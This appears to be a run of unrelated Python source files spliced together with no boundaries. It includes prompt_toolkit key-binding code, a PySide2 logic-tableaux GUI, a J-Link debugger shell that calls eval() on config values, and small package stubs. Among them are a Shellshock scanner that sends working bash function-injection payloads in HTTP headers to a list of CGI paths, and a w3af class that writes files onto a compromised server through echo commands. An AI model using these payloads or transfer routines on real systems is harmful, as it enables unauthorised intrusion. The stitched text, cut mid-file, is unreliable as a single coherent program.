for b in self.bindings: if b.handler == function: self.bindings.remove(b) found = True else: assert len(args) > 0 args = cast(Tuple[Union[Keys, str]], args) # Remove this sequence of key bindings. keys = tuple(_parse_key(k) for k in args) for b in self.bindings: if b.keys == keys: self.bindings.remove(b) found = True if found: self._clear_cache() else: # No key binding found for this function. Raise ValueError. raise ValueError("Binding not found: %r" % (function,)) # For backwards-compatibility. add_binding = add remove_binding = remove def get_bindings_for_keys(self, keys: KeysTuple) -> List[Binding]: """ Return a list of key bindings that can handle this key. (This return also inactive bindings, so the `filter` still has to be called, for checking it.) :param keys: tuple of keys. """ def get() -> List[Binding]: result: List[Tuple[int, Binding]] = [] for b in self.bindings: if len(keys) == len(b.keys): match = True any_count = 0 for i, j in zip(b.keys, keys): if i != j and i != Keys.Any: match = False break if i == Keys.Any: any_count += 1 if match: result.append((any_count, b)) # Place bindings that have more 'Any' occurrences in them at the end. result = sorted(result, key=lambda item: -item[0]) return [item[1] for item in result] return self._get_bindings_for_keys_cache.get(keys, get) def get_bindings_starting_with_keys(self, keys: KeysTuple) -> List[Binding]: """ Return a list of key bindings that handle a key sequence starting with `keys`. (It does only return bindings for which the sequences are longer than `keys`. And like `get_bindings_for_keys`, it also includes inactive bindings.) :param keys: tuple of keys. """ def get() -> List[Binding]: result = [] for b in self.bindings: if len(keys) < len(b.keys): match = True for i, j in zip(b.keys, keys): if i != j and i != Keys.Any: match = False break if match: result.append(b) return result return self._get_bindings_starting_with_keys_cache.get(keys, get) def _parse_key(key: Union[Keys, str]) -> Union[str, Keys]: """ Replace key by alias and verify whether it's a valid one. """ # Already a parse key? -> Return it. if isinstance(key, Keys): return key # Lookup aliases. key = KEY_ALIASES.get(key, key) # Replace 'space' by ' ' if key == "space": key = " " # Return as `Key` object when it's a special key. try: return Keys(key) except ValueError: pass # Final validation. if len(key) != 1: raise ValueError("Invalid key: %s" % (key,)) return key def key_binding( filter: FilterOrBool = True, eager: FilterOrBool = False, is_global: FilterOrBool = False, save_before: Callable[["KeyPressEvent"], bool] = (lambda event: True), record_in_macro: FilterOrBool = True, ) -> Callable[[KeyHandlerCallable], Binding]: """ Decorator that turn a function into a `Binding` object. This can be added to a `KeyBindings` object when a key binding is assigned. """ assert save_before is None or callable(save_before) filter = to_filter(filter) eager = to_filter(eager) is_global = to_filter(is_global) save_before = save_before record_in_macro = to_filter(record_in_macro) keys = () def decorator(function: KeyHandlerCallable) -> Binding: return Binding( keys, function, filter=filter, eager=eager, is_global=is_global, save_before=save_before, record_in_macro=record_in_macro, ) return decorator class _Proxy(KeyBindingsBase): """ Common part for ConditionalKeyBindings and _MergedKeyBindings. """ def __init__(self) -> None: # `KeyBindings` to be synchronized with all the others. 
self._bindings2: KeyBindingsBase = KeyBindings() self._last_version: Hashable = () def _update_cache(self) -> None: """ If `self._last_version` is outdated, then this should update the version and `self._bindings2`. """ raise NotImplementedError # Proxy methods to self._bindings2. @property def bindings(self) -> List[Binding]: self._update_cache() return self._bindings2.bindings @property def _version(self) -> Hashable: self._update_cache() return self._last_version def get_bindings_for_keys(self, *a, **kw): self._update_cache() return self._bindings2.get_bindings_for_keys(*a, **kw) def get_bindings_starting_with_keys(self, *a, **kw): self._update_cache() return self._bindings2.get_bindings_starting_with_keys(*a, **kw) class ConditionalKeyBindings(_Proxy): """ Wraps around a `KeyBindings`. Disable/enable all the key bindings according to the given (additional) filter.:: @Condition def setting_is_true(): return True # or False registry = ConditionalKeyBindings(key_bindings, setting_is_true) When new key bindings are added to this object. They are also enable/disabled according to the given `filter`. :param registries: List of :class:`.KeyBindings` objects. :param filter: :class:`~prompt_toolkit.filters.Filter` object. """ def __init__( self, key_bindings: KeyBindingsBase, filter: FilterOrBool = True ) -> None: _Proxy.__init__(self) self.key_bindings = key_bindings self.filter = to_filter(filter) def _update_cache(self) -> None: " If the original key bindings was changed. Update our copy version. " expected_version = self.key_bindings._version if self._last_version != expected_version: bindings2 = KeyBindings() # Copy all bindings from `self.key_bindings`, adding our condition. for b in self.key_bindings.bindings: bindings2.bindings.append( Binding( keys=b.keys, handler=b.handler, filter=self.filter & b.filter, eager=b.eager, is_global=b.is_global, save_before=b.save_before, record_in_macro=b.record_in_macro, ) ) self._bindings2 = bindings2 self._last_version = expected_version class _MergedKeyBindings(_Proxy): """ Merge multiple registries of key bindings into one. This class acts as a proxy to multiple :class:`.KeyBindings` objects, but behaves as if this is just one bigger :class:`.KeyBindings`. :param registries: List of :class:`.KeyBindings` objects. """ def __init__(self, registries: Sequence[KeyBindingsBase]) -> None: _Proxy.__init__(self) self.registries = registries def _update_cache(self) -> None: """ If one of the original registries was changed. Update our merged version. """ expected_version = tuple(r._version for r in self.registries) if self._last_version != expected_version: bindings2 = KeyBindings() for reg in self.registries: bindings2.bindings.extend(reg.bindings) self._bindings2 = bindings2 self._last_version = expected_version def merge_key_bindings(bindings: Sequence[KeyBindingsBase]) -> _MergedKeyBindings: """ Merge multiple :class:`.Keybinding` objects together. Usage:: bindings = merge_key_bindings([bindings1, bindings2, ...]) """ return _MergedKeyBindings(bindings) class DynamicKeyBindings(_Proxy): """ KeyBindings class that can dynamically returns any KeyBindings. :param get_key_bindings: Callable that returns a :class:`.KeyBindings` instance. """ def __init__( self, get_key_bindings: Callable[[], Optional[KeyBindingsBase]] ) -> None: self.get_key_bindings = get_key_bindings self.__version = 0 self._last_child_version = None self._dummy = KeyBindings() # Empty key bindings. 
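# --- Illustrative usage sketch (not part of the original module) ---
# DynamicKeyBindings defers to whatever registry its callable returns when the
# proxy refreshes its cache, so the active bindings can be swapped while the
# application runs; returning None falls back to the empty internal registry.
# The app_state dict is a hypothetical stand-in for real application state, and
# the import path is assumed to mirror this file.
from prompt_toolkit.key_binding.key_bindings import DynamicKeyBindings, KeyBindings

app_state = {"kb": None}

def _current_bindings():
    # Called whenever the proxy refreshes; may return None or a KeyBindingsBase.
    return app_state["kb"]

dynamic = DynamicKeyBindings(_current_bindings)

quit_kb = KeyBindings()

@quit_kb.add("c-q")
def _(event):
    event.app.exit()  # illustrative handler: leave the application

app_state["kb"] = quit_kb  # from here on, lookups through `dynamic` see quit_kb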
def _update_cache(self) -> None: key_bindings = self.get_key_bindings() or self._dummy assert isinstance(key_bindings, KeyBindingsBase) version = id(key_bindings), key_bindings._version self._bindings2 = key_bindings self._last_version = version class GlobalOnlyKeyBindings(_Proxy): """ Wrapper around a :class:`.KeyBindings` object that only exposes the global key bindings. """ def __init__(self, key_bindings: KeyBindingsBase) -> None: _Proxy.__init__(self) self.key_bindings = key_bindings def _update_cache(self) -> None: """ If one of the original registries was changed. Update our merged version. """ expected_version = self.key_bindings._version if self._last_version != expected_version: bindings2 = KeyBindings() for b in self.key_bindings.bindings: if b.is_global(): bindings2.bindings.append(b) self._bindings2 = bindings2 self._last_version = expected_version from rest_framework.exceptions import APIException class MissingParameterException(APIException): status_code = 422 default_detail = 'Metric id, channel id, start time and end time required' default_code = 'missing_parameter' gusgordon/airmass from airmassc import c_compute_airmass as _compute_airmass from .airmass import compute, from_altitude, water_vapor_col_density from .solar import ( get_solar_spectrum_modtran, get_solar_irradiance, get_ozone_ppm, get_cross_section, get_air_mass_extinction, get_ozone_particle_col_density, get_cloud_attentuation, solar_intensity_time ) ZooAtmosphereGroup/HelloPackages """ EchoLinux.py Copyright 2006 This file is part of w3af, http://w3af.org/ . w3af is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. w3af is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with w3af; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import time import w3af.core.controllers.output_manager as om from w3af.core.controllers.payload_transfer.base_payload_transfer import BasePayloadTransfer class EchoLinux(BasePayloadTransfer): """ This is a class that defines how to send a file to a remote server using the "echo" command. """ def __init__(self, exec_method, os): super(EchoLinux, self).__init__(exec_method, os) self._exec_method = exec_method self._os = os self._step = 30 def can_transfer(self): """ This method is used to test if the transfer method works as expected. The implementation of this should transfer 10 bytes and check if they arrived as expected to the other end. """ # Check if echo exists and works as expected res = self._exec_method("/bin/echo -n 'w3af'") if 'w3af' != res: om.out.debug('Remote server returned: "' + res + '" when expecting "w3af".') return False else: return True def estimate_transfer_time(self, size): """ :return: An estimated transfer time for a file with the specified size. """ before = time.time() res = self._exec_method("echo w3af") after = time.time() # Estimate the time... 
numberOfRequests = size / self._step requestTime = after - before timeTaken = round(requestTime * numberOfRequests) om.out.debug( 'The file transfer will take "' + str(timeTaken) + '" seconds.') return int(timeTaken) def transfer(self, data_str, destination): """ This method is used to transfer the data_str from w3af to the compromised server. """ self._filename = destination # Zeroing destination file self._exec_method('> ' + self._filename) i = 0 while i < len(data_str): # Prepare the command cmd = "/bin/echo -ne " for c in data_str[i:i + self._step]: cmd += '\\\\' + oct(ord(c)).zfill(4) cmd += " >> " + self._filename i += self._step # Send the command to the remote server self._exec_method(cmd) return self.verify_upload(data_str, self._filename) def get_speed(self): """ :return: The transfer speed of the transfer object. It should return a number between 100 (fast) and 1 (slow) """ return 1 from .tensor import * from .mixup import * from .default_collate import * setup.py #!usr/bin/env python from setuptools import find_packages, setup setup( name="clib", version="0.1.9", description="Neural Network module with chainer", url="https://github.com/Swall0w/clib", install_requires=['numpy', 'chainer', 'scikit-image'], license=license, packages=find_packages(exclude=('tests')), test_suite='tests', entry_points=""" [console_scripts] pig = pig.pig:main """, ) num = input()[::-1] num1 = int(num[0]) num2 = int(num[1]) num3 = int(num[2]) for i in range(1,num1+1): for j in range(1,num2+1): for k in range(1,num3+1): result = i*j*k print(f'{i} * {j} * {k} = {result};') #!/usr/bin/env python # coding=utf-8 import urlparse import requests def verify(ip, port=80, name='', timeout=10, types='ip'): ''' payload from awvs decode script: Bash_RCE_Server_Audit.script ''' variants = [ "/", "/administrator.cgi", "/admin.cgi", "/cgi-bin/admin.cgi", "/cgi-bin/FormHandler.cgi", "/cgi-bin/FormMail.cgi", "/cgi-bin/guestbook.cgi", "/cgi-bin/search.cgi", "/cgi-sys/addalink.cgi", "/cgi-sys/entropybanner.cgi", "/cgi-sys/entropysearch.cgi", "/cgi-sys/defaultwebpage.cgi", "/cgi-sys/FormMail-clone.cgi", "/cgi-sys/domainredirect.cgi", "/cgi-bin-sdb/printenv", "/cgi-mod/index.cgi", "/cgi-bin/test.cgi", "/cgi-bin-sdb/printenv" ]; if types == 'ip': url = "{}:{}".format(ip, port) else: url = ip if not url.startswith("http:") or not url.startswith("https:"): url = 'http://' + url parsed_url = urlparse.urlparse(url) base_url = parsed_url.scheme + "://" + parsed_url.netloc info = { 'url': '', 'severity': 'high', 'vuln_name': 'shellshock', 'proof': 'Referer/UA/shellsock/ in headers' } headers = {} headers['Referer'] = '() { ' + 'Referer' + '; }; echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"' headers['User-Agent'] = '() { ' + 'User-Agent' + '; }; echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"' headers['shellshock'] = '() { (a)=>\' echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"' for var in variants: aimed_url = base_url + var try: resp = requests.get(aimed_url, headers=headers, allow_redirects=False, verify=False) html = resp.text if 'acunetixshellshock' in html: info['url'] = aimed_url return info except Exception as e: pass return Falseimport sys from typing import Union, Optional import PySide2 from 
PySide2.QtGui import QPainter, QPaintEvent, QFontMetrics from PySide2.QtWidgets import QApplication, QMainWindow, QWidget, QPushButton, QTextEdit from PySide2.QtCore import QFile, Qt from src.view.ui_mainwindow import Ui_MainWindow from src.Parser.PropParser import PropParser from src.TableauxBuilder.PropositionalTableauxBuilder import PropositionalTableauxBuilder from src.TableauxBuilder.BaseTableauxBuilder import BaseTableauxBuilder from src.builder_factory import * from src.view.BaseWindow import BaseWindow from src.view.InputWindow import InputWindow from src.view.CustomPainter import CustomPainter from src.view.DrawingCalculator import DrawingCalculator def get_child_widget(parent: QWidget, name: str) -> Union[Optional[QWidget], None]: for child in parent.children(): if child.objectName() == name: return child sub_child = get_child_widget(child, name) if sub_child is not None: return sub_child return None def curry(function, *c_args, **c_kwargs): def curried(*args, **kwargs): return function(*c_args, *args, **c_kwargs, **kwargs) return curried class ResolveMode: Automatic = 1 Manual = 2 class MainWindow(BaseWindow): input_window = None def __init__(self): super().__init__() self.ui = Ui_MainWindow() self.ui.setupUi(self) self.mode = ResolveMode.Automatic # create reset button in code to put it over scroll area self.reset_btn = QPushButton(self) self.reset_btn.setText('Reset') self.reset_btn.setGeometry(16, 118, 45, 28) self.reset_btn.show() # setup slots self.ui.pl_radio_btn.toggled.connect(self.logic_changed) self.ui.fopl_radio_btn.toggled.connect(self.logic_changed) self.ui.ipl_radio_btn.toggled.connect(self.logic_changed) self.ui.ifopl_radio_btn.toggled.connect(self.logic_changed) self.ui.automatic_radio_btn.toggled.connect(self.mode_changed) self.ui.manual_radio_btn.toggled.connect(self.mode_changed) self.ui.start_calc_btn.clicked.connect(self.calculate_pressed) self.ui.help_button.clicked.connect(self.show_help) self.reset_btn.clicked.connect(self.reset) # subscribe to draw events self.scroll_area_content = self.ui.scrollAreaWidgetContents self.scroll_area_content.installEventFilter(self) self.row_height = 50 self.margin = 10 self.d_margin = 2 * self.margin # size of the scroll area content self.max_width = 700 self.max_height = 400 self.tableaux_builder: BaseTableauxBuilder = None self.expr_btns = dict() def eventFilter(self, watched: PySide2.QtCore.QObject, event: PySide2.QtCore.QEvent): if watched is self.scroll_area_content and type(event) is QPaintEvent: p = CustomPainter(self.scroll_area_content) p.begin() if self.tableaux_builder is None: # no expression entered yet p.draw_tableau_header(self.logic_type) p.end() return False # calculate horizontal center width_l, width_r = self.tableaux_builder.get_drawn_width( p.get_text_width, self.d_margin, self.mode == ResolveMode.Manual) x = width_l + self.d_margin x = max(x, self.d_margin + 125) # ensure space to border p.drawLine(x - 125, 75, x + 125, 75) p.drawLine(x, 25, x, 125) p.drawText(x - 65, 50, self.tableaux_builder.left_side_sign) p.drawText(x + 62, 50, self.tableaux_builder.right_side_sign) manual = self.mode == ResolveMode.Manual intuitionistic = self.logic_type in [LogicType.IPROPOSITIONAL, LogicType.IFOPL] drawing_calculator = DrawingCalculator( self.tableaux_builder, p, manual, intuitionistic, self.margin, x ) self.draw_path(p, self.tableaux_builder, drawing_calculator, x=x) p.end() self.scroll_area_content.setMinimumSize(self.max_width + self.d_margin, self.max_height + self.d_margin) return False def get_y(self, 
layer): """ Returns the vertical position of the given layer """ return 125 + self.row_height * layer def manually_entered(self, success): self.input_window = None for k, btn in self.expr_btns.items(): btn.hide() del btn self.expr_btns = dict() self.scroll_area_content.repaint() def manual_btn_pressed_wrapper(self, expr, tableau): def manual_btn_pressed(): if self.input_window is not None: return self.input_window = InputWindow(self.manually_entered, self.logic_type, expr, tableau) self.input_window.show() return manual_btn_pressed def draw_btn(self, painter, tableau): def draw_btn(text, x, y, expr): if (x,y) not in self.expr_btns: btn = QPushButton(self.scroll_area_content) btn.show() btn.setFont(painter.btn_font) btn.setText(text.replace('&', '&&')) btn.setGeometry(x, y - 20, painter.get_text_width(text), 26) btn.clicked.connect(self.manual_btn_pressed_wrapper(expr, tableau)) self.expr_btns[(x,y)] = btn return draw_btn def draw_path( self, p: CustomPainter, tableau: BaseTableauxBuilder, drawing_calculator, layer=0, x=375): """ Draws all expressions in the tableau """ expr_pos = drawing_calculator.calc_expr_positions(self.draw_btn) # draw expressions for pos_x, expr, draw_fun, expr_str in expr_pos: y_1 = self.get_y(layer) y_2 = self.get_y(layer+1) draw_fun(expr_str, pos_x, y_1) p.drawLine(x, y_1, x, y_2) layer += 1 # update max width/height txt_width = p.get_text_width(expr_str) self.max_width = max(self.max_width, pos_x + txt_width) self.max_height = max(self.max_height, y_2) if len(tableau.children) == 0: # draw end sign of the branch if drawing_calculator.closed: width = 10 y = self.get_y(layer) p.drawLine(x - width, y, x + width, y) if drawing_calculator.done and not drawing_calculator.closed: diameter = 10 p.drawEllipse(x - diameter / 2, self.get_y(layer), diameter, diameter) return if len(tableau.children) == 1 and tableau.children[0].clears_false_exprs: # only a single child that clears false expressions child = tableau.children[0] width_l, width_r = child.get_drawn_width(p.get_text_width, self.d_margin, drawing_calculator.manual) y = self.get_y(layer) p.drawLine(x - width_l, y, x + width_r, y) p.drawLine(x, y, x, self.get_y(layer+1)) self.draw_path(p, child, drawing_calculator.get_child(0, x), layer+1, x) return # draw left branch y = self.get_y(layer) left = tableau.children[0] width_l, width_r = left.get_drawn_width(p.get_text_width, self.d_margin, drawing_calculator.manual) new_x = x - width_r - self.d_margin x_1 = new_x - width_l - self.d_margin if left.clears_false_exprs else new_x p.drawLine(x, y, x_1, y) p.drawLine(new_x, y, new_x, self.get_y(layer+1)) self.draw_path(p, left, drawing_calculator.get_child(0, new_x), layer+1, new_x) # draw right branch right = tableau.children[1] width_l, width_r = right.get_drawn_width(p.get_text_width, self.d_margin, drawing_calculator.manual) new_x = x + width_l + self.d_margin x_1 = new_x + width_r + self.d_margin if right.clears_false_exprs else new_x p.drawLine(x, y, x_1, y) p.drawLine(new_x, y, new_x, self.get_y(layer+1)) self.draw_path(p, right, drawing_calculator.get_child(1, new_x), layer+1, new_x) def logic_changed(self): """ This function is called when a logic radio button is toggled """ if self.ui.pl_radio_btn.isChecked(): self.logic_type = LogicType.PROPOSITIONAL if self.ui.fopl_radio_btn.isChecked(): self.logic_type = LogicType.FOPL if self.ui.ipl_radio_btn.isChecked(): self.logic_type = LogicType.IPROPOSITIONAL if self.ui.ifopl_radio_btn.isChecked(): self.logic_type = LogicType.IFOPL self.scroll_area_content.repaint() def 
mode_changed(self): """ This function is called when a mode button is toggled """ if self.ui.automatic_radio_btn.isChecked(): self.mode = ResolveMode.Automatic if self.ui.manual_radio_btn.isChecked(): self.mode = ResolveMode.Manual def calculate_pressed(self): """ This function is called after the calculate button is pressed """ # get the entered expressions left_exprs = self.parse_exprs(self.ui.inital_left_exprs_text_edit, self.scroll_area_content) right_exprs = self.parse_exprs(self.ui.inital_right_exprs_text_edit, self.scroll_area_content) if left_exprs is None or right_exprs is None: return constants = self.constants_from_trees(left_exprs + right_exprs) functions = self.functions_from_trees(left_exprs + right_exprs) left_exprs = self.exprs_from_trees(left_exprs) right_exprs = self.exprs_from_trees(right_exprs) # create tableau builder with expressions self.tableaux_builder = create_tableau_builder( logic_type=self.logic_type, left_exprs=left_exprs, right_exprs=right_exprs, visit_idx=self.parser.parse_idx, constants=constants, functions=functions, ) # hide widgets to enter initial expressions self.ui.inital_left_exprs_text_edit.hide() self.ui.inital_right_exprs_text_edit.hide() self.ui.start_calc_btn.hide() self.ui.inital_left_exprs_text_edit.setStyleSheet('') self.ui.inital_right_exprs_text_edit.setStyleSheet('') self.ui.logic_type_gb.setEnabled(False) self.ui.calc_mode_gb.setEnabled(False) if self.error_widget is not None: self.error_widget.hide() # if automatic, try to auto resolve the tableau if self.mode == ResolveMode.Automatic: try: self.tableaux_builder.auto_resolve() self.scroll_area_content.repaint() except Exception as e: print(e) self.show_error(self.scroll_area_content, 'No automatic resolution possible'\ '

The automatic resolution failed. Try to calculate the Tableau manually.

') self.reset() self.scroll_area_content.repaint() def reset(self): if self.tableaux_builder is None: self.ui.inital_left_exprs_text_edit.setText('') self.ui.inital_right_exprs_text_edit.setText('') self.tableaux_builder = None self.ui.inital_left_exprs_text_edit.show() self.ui.inital_right_exprs_text_edit.show() self.ui.start_calc_btn.show() self.ui.logic_type_gb.setEnabled(True) self.ui.calc_mode_gb.setEnabled(True) self.ui.start_calc_btn.setEnabled(True) self.max_width = 700 self.max_height = 400 self.scroll_area_content.setMinimumSize(self.max_width + self.d_margin, self.max_height + self.d_margin) for k, btn in self.expr_btns.items(): btn.hide() del btn self.expr_btns = dict() self.scroll_area_content.repaint() if __name__ == '__main__': app = QApplication(sys.argv) window = MainWindow() window.show() sys.exit(app.exec_()) 1-10 #!/usr/bin/env python # -*- encoding: utf-8 -*- # Created on 2017/1/29 20:47 # Project: turboPydDNS # __author__ = 'ihipop' __version__ = '0.1' 0 #!python3 import os import re import sys import ptkcmd import functools import configparser from prompt_toolkit.completion import Completion from prompt_toolkit.shortcuts import yes_no_dialog import jlink import xlink import svd import hardfault import callstack #sys.path.append(sys.exec_prefix + r'\venv\Lib\site-packages') #import ipdb os.environ['PATH'] = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'libusb-1.0.24/MinGW64/dll') + os.pathsep + os.environ['PATH'] class DAPCmdr(ptkcmd.PtkCmd): prompt = 'DAPCmdr > ' intro = '''J-Link and DAPLink Commander v0.6 blank line for connection, ? for help address and value use hexadecimal, count use decimal\n''' def __init__(self): super(DAPCmdr, self).__init__(self) self.initSetting() self.env = { '%pwd%': os.getcwd(), '%home%': os.path.expanduser('~') } self.env.update(self.get_MDK_Packs_path()) def initSetting(self): if not os.path.exists('setting.ini'): open('setting.ini', 'w') self.conf = configparser.ConfigParser() self.conf.read('setting.ini', encoding='utf-8') if not self.conf.has_section('paths'): self.conf.add_section('paths') self.conf.set('paths', 'dllpath', r'C:\Segger\JLink_V692\JLink_x64.dll') self.conf.set('paths', 'svdpath', r'["C:\Keil_v5\ARM\Packs\Keil\STM32F1xx_DFP\2.3.0\SVD\STM32F103xx.svd"]') self.conf.set('paths', 'dispath', r'["D:\Project\STM32_Blinky\out\STM32_Blinky.axf"]') self.conf.write(open('setting.ini', 'w', encoding='utf-8')) self.svdpaths = eval(self.conf.get('paths', 'svdpath')) self.dispaths = eval(self.conf.get('paths', 'dispath')) self.dllpath = self.conf.get('paths', 'dllpath') self.svdpath = self.svdpaths[0] self.dispath = self.dispaths[0] if os.path.isfile(self.svdpath): self.dev = svd.SVD(self.svdpath).device self.mcucore = self.dev.cpu.name else: self.mcucore = 'Cortex-M0' def preloop(self): self.onecmd('path') self.xlk = None self.onecmd('') def emptyline(self): try: if self.xlk == None: try: from pyocd.probe import aggregator from pyocd.coresight import dap, ap, cortex_m daplinks = aggregator.DebugProbeAggregator.get_all_connected_probes() except Exception as e: daplinks = [] if daplinks and os.path.isfile(self.dllpath): use_dap = yes_no_dialog(title='J-Link or DAPLink', text=f'Do you want to use {daplinks[0].product_name}?').run() elif os.path.isfile(self.dllpath): use_dap = False elif daplinks: use_dap = True else: raise Exception('No link found') if use_dap: daplink = daplinks[0] daplink.open() _dp = dap.DebugPort(daplink, None) _dp.init() _dp.power_up_debug() _ap = ap.AHB_AP(_dp, 0) _ap.init() self.xlk = 
xlink.XLink(cortex_m.CortexM(None, _ap)) else: self.xlk = xlink.XLink(jlink.JLink(self.dllpath, self.mcucore)) else: self.xlk.close() self.xlk.open(self.mcucore) print(f'CPU core is {self.xlk.read_core_type()}\n') except Exception as e: print('connection fail\n') self.xlk = None def connection_required(func): @functools.wraps(func) def wrapper(self, *args, **kwargs): try: self.xlk.read_core_type() except Exception as e: print('no connection established\n') self.xlk = None return try: func(self, *args, **kwargs) except Exception as e: print('command argument error, please check!\n') return wrapper @connection_required def do_rd8(self, addr, cnt): '''Read 8-bit items. Syntax: rd8 \n''' addr, cnt = int(addr, 16), int(cnt, 10) arr = self.xlk.read_mem_U8(addr, cnt) print(''.join(['%02X, ' %x for x in arr]) + '\n') @connection_required def do_rd16(self, addr, cnt): '''Read 16-bit items. Syntax: rd16 \n''' addr, cnt = int(addr, 16), int(cnt, 10) arr = self.xlk.read_mem_U16(addr, cnt) print(''.join(['%04X, ' %x for x in arr]) + '\n') @connection_required def do_rd32(self, addr, cnt): '''Read 32-bit items. Syntax: rd32 \n''' addr, cnt = int(addr, 16), int(cnt, 10) arr = self.xlk.read_mem_U32(addr, cnt) print(''.join(['%08X, ' %x for x in arr]) + '\n') @connection_required def do_wr8(self, addr, val): '''Write 8-bit items. Syntax: wr8 \n''' addr, val = int(addr, 16), int(val, 16) self.xlk.write_U8(addr, val) print() @connection_required def do_wr16(self, addr, val): '''Write 16-bit items. Syntax: wr16 \n''' addr, val = int(addr, 16), int(val, 16) self.xlk.write_U16(addr, val) print() @connection_required def do_wr32(self, addr, val): '''Write 32-bit items. Syntax: wr32 \n''' addr, val = int(addr, 16), int(val, 16) self.xlk.write_U32(addr, val) print() @connection_required def do_loadbin(self, file, addr): '''Load binary file into target memory. Syntax: loadbin \n''' addr = int(addr, 16) with open(file, 'rb') as f: data = f.read() self.xlk.write_mem(addr, data) print() @connection_required def do_savebin(self, file, addr, cnt): '''Save target memory into binary file. Syntax: savebin \n''' addr, cnt = int(addr, 16), int(cnt, 10) with open(file, 'wb') as f: data = self.xlk.read_mem_U8(addr, cnt) f.write(bytes(data)) print() @connection_required def do_regs(self): '''Display core registers value. 
Syntax: regs Can only exec when Core halted\n''' if not self.xlk.halted(): print('should halt first!\n') return regs = ['R0', 'R1', 'R2', 'R3', 'R4', 'R5', 'R6', 'R7', 'R8', 'R9', 'R10', 'R11', 'R12', 'SP', 'LR', 'PC', 'MSP', 'PSP', 'XPSR', 'CONTROL' ] vals = self.xlk.read_regs(regs) vals['CONTROL'] >>= 24 # the J-Link Control Panel also displays the pre-shift value print('R0 : %08X R1 : %08X R2 : %08X R3 : %08X\n' 'R4 : %08X R5 : %08X R6 : %08X R7 : %08X\n' 'R8 : %08X R9 : %08X R10: %08X R11: %08X\n' 'R12: %08X SP : %08X LR : %08X PC : %08X\n' 'MSP: %08X PSP: %08X XPSR: %08X\n' 'CONTROL: %02X (when Thread mode: %s, use %s)\n' %(vals['R0'], vals['R1'], vals['R2'], vals['R3'], vals['R4'], vals['R5'], vals['R6'], vals['R7'], vals['R8'], vals['R9'], vals['R10'], vals['R11'], vals['R12'], vals['SP'], vals['LR'], vals['PC'], vals['MSP'], vals['PSP'], vals['XPSR'], vals['CONTROL'], 'unprivileged' if vals['CONTROL']&1 else 'privileged', 'PSP' if vals['CONTROL']&2 else 'MSP', )) if vals['XPSR'] & 0xFF == 3: if self.xlk.read_core_type() not in ['Cortex-M0', 'Cortex-M0+']: causes = hardfault.diagnosis(self.xlk) print("\n".join(causes)) if (vals['LR'] >> 2) & 1 == 0: fault_SP = vals['MSP'] # the stack in use when the HardFault occurred, i.e. the stack holding the HardFault exception frame else: fault_SP = vals['PSP'] stackMem = self.xlk.read_mem_U32(fault_SP, 64) # the number of words read must be a multiple of 8 print(f'\nStack Content @ 0x{fault_SP:08X}:') for i in range(len(stackMem) // 8): print(f'{fault_SP+i*8*4:08X}: {stackMem[i*8]:08X} {stackMem[i*8+1]:08X} {stackMem[i*8+2]:08X} {stackMem[i*8+3]:08X} {stackMem[i*8+4]:08X} {stackMem[i*8+5]:08X} {stackMem[i*8+6]:08X} {stackMem[i*8+7]:08X}') if os.path.isfile(self.dispath): cs = callstack.CallStack(self.dispath) if cs.Functions: print(f'\n{cs.parseStack(stackMem)}\n') @connection_required def do_wreg(self, reg, val): '''Write core register. 
Syntax: wreg Can only exec when Core halted\n''' if not self.xlk.halted(): print('should halt first!\n') return val = int(val, 16) self.xlk.write_reg(reg, val) print() @connection_required def do_reset(self): '''reset core\n''' self.xlk.reset() print() @connection_required def do_halt(self): '''halt core\n''' self.xlk.halt() self.do_regs() @connection_required def do_go(self): '''resume core\n''' self.xlk.go() print() def do_path(self, subcmd=None, *path): '''display path, Syntax: path set JLink_x64.dll, Syntax: path dll set svd file path, Syntax: path svd set dis file path, Syntax: path dis \n''' if subcmd == None: maxlen = max(len(self.dllpath), len(self.svdpath), len(self.dispath)) print(f'{"√" if os.path.isfile(self.dllpath) else "×"} {self.dllpath:{maxlen}}') print(f'{"√" if os.path.isfile(self.svdpath) else "×"} {self.svdpath:{maxlen}}') print(f'{"√" if os.path.isfile(self.dispath) else "×"} {self.dispath:{maxlen}}\n') else: if path: path = ' '.join(path) match = re.match(r'%\w+%', path) if match: path = path.replace(match.group(0), self.env[match.group(0)]) if os.path.isfile(path): # return True if path is an existing regular file if subcmd == 'dll': self.dllpath = path elif subcmd == 'svd': self.svdpath = path self.dev = svd.SVD(self.svdpath).device self.mcucore = self.dev.cpu.name elif subcmd == 'dis': self.dispath = path else: print(f'{subcmd} Unknown\n') self.saveSetting() else: print('Not exists or Not file\n') else: print('Input error\n') def complete_path(self, pre_args, curr_arg, document, complete_event): if len(pre_args) > 0: if pre_args[0] == 'dll': extra_paths =[self.dllpath] elif pre_args[0] == 'svd': extra_paths = self.svdpaths elif pre_args[0] == 'dis': extra_paths = self.dispaths else: return yield from ptkcmd.complete_path(' '.join([*pre_args[1:], curr_arg]), extra_paths, self.env) @connection_required def do_sv(self, input, val=None): '''svd-based peripheral register read and write register read: sv . register write: sv . register field write: sv .. 
